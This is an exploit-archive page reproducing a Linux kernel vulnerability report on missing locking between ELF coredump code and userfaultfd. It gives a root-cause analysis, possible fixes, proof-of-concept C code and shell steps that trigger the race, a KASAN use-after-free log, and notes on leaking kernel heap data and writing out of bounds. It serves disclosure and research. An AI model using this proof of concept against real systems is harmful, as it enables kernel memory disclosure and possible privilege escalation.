Linux missing locking between elf coredump code and userfaultfd vma modification Vulnerability / Exploit
/
/
/
Exploits / Vulnerability Discovered : 2019-04-30 |
Type : dos |
Platform : linux
[+] Code ...
elf_core_dump() has a comment back from something like 2.5.43-C3 that says:
/*
* We no longer stop all VM operations.
*
* This is because those proceses that could possibly change map_count
* or the mmap / vma pages are now blocked in do_exit on current
* finishing this core dump.
*
* Only ptrace can touch these memory addresses, but it doesn't change
* the map_count or the pages allocated. So no possibility of crashing
* exists while dumping the mm->vm_next areas to the core file.
*/
However, since commit 86039bd3b4e6 ("userfaultfd: add new syscall to provide
memory externalization", introduced in v4.3), that's no longer true; the
following functions can call vma_merge() on another task's VMAs while holding
the corresponding mmap_sem for writing:
- userfaultfd_release() [->release handler]
- userfaultfd_register() [invoked via ->unlocked_ioctl handler]
- userfaultfd_unregister() [invoked via ->unlocked_ioctl handler]
This means that VMAs can disappear from under elf_core_dump().
I see two potential ways to fix this, but I'm not sure whether either of them is
good:
1. Let elf_core_dump() hold a read lock on the mmap_sem across the page-dumping
loop. This would mean that the mmap_sem can be blocked indefinitely by a
userspace process, and e.g. userfaultfd_release() could block the task or
global workqueue it's running on (depending on where the final fput()
happened) indefinitely, which seems potentially bad from a denial-of-service
perspective?
2. Let coredump_wait() set a flag on the mm_struct before dropping the mmap_sem
that says "this mm_struct is going away, keep your hands off";
let the userfaultfd ioctl handlers check for the flag and bail out as if the
mm_struct was already dead;
hack userfaultfd_release() so that it only calls vma_merge() if the flag
hasn't been set;
and because I feel icky about concurrent reads and writes of bitmasks without
explicit annotations, either make the vm_flags accesses in
userfaultfd_release() and in everything called from elf_core_dump() atomic
(because userfaultfd_release will clear bits in them concurrently with reads
from elf_core_dump()) or let elf_core_dump() take the mmap_sem for reading
while looking at vm_flags.
If the fix goes in this direction, it should probably come with a big warning
on top of the definition of mmap_sem, or something like that.
int main(void) {
char buf[1024];
size_t total = 0;
bool slept = false;
while (1) {
int res = read(0, buf, sizeof(buf));
if (res == -1) err(1, "read");
if (res == 0) return 0;
total += res;
if (total > 1024*1024 && !slept) {
sleep(10);
slept = true;
}
}
}
user@debian:~/uffd_coredump$ gcc -o coredump_helper coredump_helper.c
user@debian:~/uffd_coredump$ cat set_helper.sh
#!/bin/sh
echo "|$(realpath ./coredump_helper)" > /proc/sys/kernel/core_pattern
user@debian:~/uffd_coredump$ sudo ./set_helper.sh
user@debian:~/uffd_coredump$ cat dumpme.c
#define _GNU_SOURCE
#include <string.h>
#include <stdlib.h>
#include <linux/userfaultfd.h>
#include <sys/ioctl.h>
#include <sys/syscall.h>
#include <err.h>
#include <unistd.h>
#include <sys/mman.h>
int main(void) {
// set up an area consisting of half normal anon memory, half present userfaultfd region
void *area = mmap(NULL, 1024*1024*2, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0);
if (area == MAP_FAILED) err(1, "mmap");
memset(area, 'A', 1024*1024*2);
int uffd = syscall(__NR_userfaultfd, 0);
if (uffd == -1) err(1, "userfaultfd");
struct uffdio_api api = { .api = 0xAA, .features = 0 };
if (ioctl(uffd, UFFDIO_API, &api)) err(1, "API");
struct uffdio_register reg = {
.range = { .start = (unsigned long)area+1024*1024, .len = 1024*1024 },
.mode = UFFDIO_REGISTER_MODE_MISSING
};
if (ioctl(uffd, UFFDIO_REGISTER, ®)) err(1, "REGISTER");
// spawn a child that can do stuff with the userfaultfd
pid_t child = fork();
if (child == -1) err(1, "fork");
if (child == 0) {
sleep(3);
if (ioctl(uffd, UFFDIO_UNREGISTER, ®.range)) err(1, "UNREGISTER");
exit(0);
}
[ 139.072235] The buggy address belongs to the object at ffff8881e616ed50
which belongs to the cache vm_area_struct of size 200
[ 139.075075] The buggy address is located 16 bytes inside of
200-byte region [ffff8881e616ed50, ffff8881e616ee18)
[ 139.077556] The buggy address belongs to the page:
[ 139.078648] page:ffffea0007985b00 count:1 mapcount:0 mapping:ffff8881eada6f00 index:0x0 compound_mapcount: 0
[ 139.080745] flags: 0x17fffc000010200(slab|head)
[ 139.081724] raw: 017fffc000010200 ffffea000792dc08 ffffea0007765c08 ffff8881eada6f00
[ 139.083477] raw: 0000000000000000 00000000001d001d 00000001ffffffff 0000000000000000
[ 139.085121] page dumped because: kasan: bad access detected
[ 139.086667] Memory state around the buggy address:
[ 139.087695] ffff8881e616ec00: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc
[ 139.089294] ffff8881e616ec80: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc
[ 139.090833] >ffff8881e616ed00: fc fc fc fc fc fc fc fc fc fc fb fb fb fb fb fb
[ 139.092417] ^
[ 139.093780] ffff8881e616ed80: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb
[ 139.095318] ffff8881e616ee00: fb fb fb fc fc fc fc fc fc fc fc fc fc fc fc fc
[ 139.096917] ==================================================================
[ 139.098460] Disabling lock debugging due to kernel taint
======================================================================
One thing that makes exploitation nice here is that concurrent modification of the number of VMAs throws off the use of the heap-allocated array `vma_filesz`: First vma_filesz is allocated with a size based on the number of VMAs, then it is filled by iterating over the VMAs and writing their calculated sizes into the array (without re-checking against the array's size), and then the function iterates over the VMAs again and dumps the entries in vma_filesz to userspace, again without checking whether the array bounds were exceeded.
This means that you can use this to:
- leak in-bounds uninitialized values
- leak out-of-bounds data
- write out-of-bounds data (with constraints on what can be written)
By using FUSE as source of file mappings and as coredump target (assuming that the system has the upstream default core_pattern), you can pause both the loop that performs out-of-bounds writes as well as the loop that performs out-of-bounds reads, so you should be able to abuse this to write in the middle of newly allocated objects if you want to.
The attached proof-of-concept just demonstrates how you can use this to leak kernel heap data because I didn't want to spend too much time on building a PoC for this.